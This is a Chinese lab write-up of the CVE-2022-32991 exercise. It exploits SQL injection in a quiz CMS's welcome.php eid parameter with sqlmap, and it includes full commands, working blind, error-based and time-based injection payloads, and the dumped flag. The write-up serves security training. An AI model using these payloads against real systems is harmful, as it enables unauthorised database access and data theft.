靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

访问页面,先注册,使用邮箱加密码登录。

bp抓包,后台挂上sqlipy然后去测welcome.php,常用的语句都没成功但过一会就有了结果,注入点在eid这个参数,看payload是bool盲注。

直接sqlmap一把梭,脱裤。

sqlmap -r sql.txt --dbs --batch

剩下的就简单了:

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf --tables --batch

...

[09:17:02] [INFO] the back-end DBMS is MySQL

web application technology: PHP 7.2.20

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[09:17:02] [INFO] fetching tables for database: 'ctf'

[09:17:02] [WARNING] reflective value(s) found and filtering out

[09:17:02] [INFO] retrieved: 'user'

[09:17:02] [INFO] retrieved: 'options'

[09:17:02] [INFO] retrieved: 'quiz'

[09:17:03] [INFO] retrieved: 'admin'

[09:17:03] [INFO] retrieved: 'questions'

[09:17:03] [INFO] retrieved: 'history'

[09:17:03] [INFO] retrieved: 'rank'

[09:17:03] [INFO] retrieved: 'flag'

[09:17:03] [INFO] retrieved: 'answer'

Database: ctf

[9 tables]

+-----------+

| admin     |

| history   |

| options   |

| rank      |

| user      |

| answer    |

| flag      |

| questions |

| quiz      |

+-----------+

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag --columns --batch

        ___

       __H__

 ___ ___[']_____ ___ ___  {1.7.9#stable}

|_ -| . [)]     | .'| . |

|___|_  [']_|_|_|__,|  _|

      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:02 /2023-09-21/

[09:18:02] [INFO] parsing HTTP request from 'sql.txt'

[09:18:03] [INFO] resuming back-end DBMS 'mysql'

[09:18:03] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: eid (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based

    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34

---

[09:18:03] [INFO] the back-end DBMS is MySQL

web application technology: PHP 7.2.20

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[09:18:03] [INFO] fetching columns for table 'flag' in database 'ctf'

[09:18:03] [WARNING] reflective value(s) found and filtering out

[09:18:03] [INFO] retrieved: 'flag'

[09:18:04] [INFO] retrieved: 'varchar(1024)'

Database: ctf

Table: flag

[1 column]

+--------+---------------+

| Column | Type          |

+--------+---------------+

| flag   | varchar(1024) |

+--------+---------------+

[09:18:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:04 /2023-09-21/

root@Lockly temp/tmp » sqlmap -r sql.txt -D ctf -T flag -C flag --dump --batch

        ___

       __H__

 ___ ___["]_____ ___ ___  {1.7.9#stable}

|_ -| . [.]     | .'| . |

|___|_  [,]_|_|_|__,|  _|

      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:18:48 /2023-09-21/

[09:18:48] [INFO] parsing HTTP request from 'sql.txt'

[09:18:48] [INFO] resuming back-end DBMS 'mysql'

[09:18:48] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: eid (GET)

    Type: boolean-based blind

    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)

    Payload: q=quiz&step=2&eid=-8440' OR 5703=5703#&n=1&t=34

    Type: error-based

    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

    Payload: q=quiz&step=2&eid=60377db362694' OR (SELECT 3817 FROM(SELECT COUNT(*),CONCAT(0x7176627871,(SELECT (ELT(3817=3817,1))),0x71706a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- trpQ&n=1&t=34

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: q=quiz&step=2&eid=60377db362694' AND (SELECT 1411 FROM (SELECT(SLEEP(5)))hVOO)-- gdHD&n=1&t=34

---

[09:18:48] [INFO] the back-end DBMS is MySQL

web application technology: PHP 7.2.20

back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[09:18:48] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'

[09:18:49] [WARNING] reflective value(s) found and filtering out

[09:18:49] [INFO] retrieved: 'flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5}'

Database: ctf

Table: flag

[1 entry]

+--------------------------------------------+

| flag                                       |

+--------------------------------------------+

| flag{dca0ffb4-d243-4ebc-b6da-68da58943fd5} |

+--------------------------------------------+

[09:18:49] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'

[09:18:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zei2boyfnmt1xivgitc.cloudeci1.ichunqiu.com'

[*] ending @ 09:18:49 /2023-09-21/

root@Lockly temp/tmp »

春秋云镜 - CVE-2022-32991的更多相关文章

  1. i春秋云镜 CVE-2022-32991

    第一种方法 第二种延时注入

  2. 警惕!Python 中少为人知的 10 个安全陷阱!

    作者:Dennis Brinkrolf 译者:豌豆花下猫@Python猫 原题:10 Unknown Security Pitfalls for Python 英文:https://blog.sona ...

  3. 「你学习,我买单」i春秋四周年精品课程福利专场

    i春秋:中国专业的网络安全在线教育平台,累计用户超过60万. i春秋课程:资深专家团队教研支持,人才培养结合企业需求,针对不同岗位和技术方向的课程总计:600+门,1500+章,5700+节,时长74 ...

  4. i春秋url地址编码问题

    i春秋学院是国内比较知名的安全培训平台,前段时间看了下网站,顺便手工简单测试常见的XSS,发现网站搜索功能比较有意思. 其实是对用户输入的内容HTML编码和URL编码的处理方式在这里不合理,提交到乌云 ...

  5. Ubuntu16.04使用阿里云镜像安装Mongodb

    一.概述 近日要在新的Ubuntu16.04系统上安装MongoDB,某度结果后直接从Mongo官网直接获得3.2版本的下载链接,结果在下载时发觉速度慢的可怜.迫于无奈,只能找国内的镜像下载.切换国内 ...

  6. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  7. 爱春秋之戏说春秋 Writeup

    爱春秋之戏说春秋 Writeup 第一关 图穷匕见 这一关关键是给了一个图片,将图片下载到本地后,打开以及查看属性均无任何发现,尝试把图片转换为.txt格式.在文本的最后发现这样一串有规律的代码: 形 ...

  8. CVE

    一.简介 CVE 的英文全称是"Common Vulnerabilities & Exposures"公共漏洞和暴露.CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者 ...

  9. i春秋——春秋争霸write up

    i春秋--春秋争霸write up 第一关 题目给出一张图 提示中,这种排列源于古老的奇书,暗含了两个数字,可以得出第一关的答案是两个数字 百度识图来一发, 得到图中排列是来自于洛书,点开洛书的百度百 ...

  10. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

随机推荐

  1. Mysql优化篇-索引优化与查询优化

    1.索引失败案列 如果查询时没有使用索引,查询语句就会扫描表中所有记录,在数据量大的情况下,查询会很慢. (1)全值匹配 (2)最佳左前缀法则 mysql可以为多个字段创建索引,一个索引可以包括16个 ...

  2. 循序渐进介绍基于CommunityToolkit.Mvvm 和HandyControl的WPF应用端开发(5) -- 树列表TreeView的使用

    在我们展示一些参考信息的时候,有所会用树形列表来展示结构信息,如对于有父子关系的多层级部门机构,以及一些常用如字典大类节点,也都可以利用树形列表的方式进行展示,本篇随笔介绍基于WPF的方式,使用Tre ...

  3. Solution Set -「ARC 124」

    「ARC 124A」LR Constraints Link. 我们可以把 \(1\sim n\) 个盒子里能放的球的编号集合全部求出来.然后就直接来. 注意题目已经给出了 \(k\) 个球的位置,所以 ...

  4. 新零售SaaS架构:面向中小连锁的SaaS系统整体规划

    零售企业的发展路径 零售企业的发展路径一般可分为以下几个阶段: 单店经营阶段:企业在一个地区或城市开设单个门店.这时,企业需要把精力放在了解当地市场和顾客需求上,这是积累经验和品牌知名度的重要环节.为 ...

  5. python3 gui 计时器

    # -*- coding: utf-8 -*- # @Time : 2023/4/4 21:53 # @File : 定时器gui.py # @Software: PyCharm Community ...

  6. C静态库的创建与使用--为什么要引入静态库?

    C源程序需要经过预处理.编译.汇编几个阶段,得到各自源文件对应的可重定位目标文件,可重定位目标文件就是各个源文件的二进制机器代码,一般是.o格式.比如:util1.c.util2.c及main.c三个 ...

  7. Java多线程笔记全过程(一)

    一.多线程最基础的基本概念 一个程序最少需要一个进程,而一个进程最少需要一个线程. 我们常说的高并发,也并不全是线程级别的并发,在很多开发语言中,比如PHP,很常见的都是进程级别的并发.但是在Java ...

  8. Qt信号槽与事件循环学习笔记

    事件与事件循环 信号槽机制 事件与事件循环 在Qt中,事件(event)被封装为QEvent类/子类对象,用来表示应用内部或外部发生的各种事情.事件可以被任何QObject子类的对象接收并处理. 根据 ...

  9. 双数组字典树 (Double-array Trie) -- 代码 + 图文,看不懂你来打我

    目录 Trie 字典树 双数组Trie树 构建 字符编码 计算规则 构建 Base Array.Check Array 处理字典首字 处理字典二层字 处理字典三层字 处理字典四层字 叶子节点处理 核心 ...

  10. 解密长短时记忆网络(LSTM):从理论到PyTorch实战演示

    本文深入探讨了长短时记忆网络(LSTM)的核心概念.结构与数学原理,对LSTM与GRU的差异进行了对比,并通过逻辑分析阐述了LSTM的工作原理.文章还详细演示了如何使用PyTorch构建和训练LSTM ...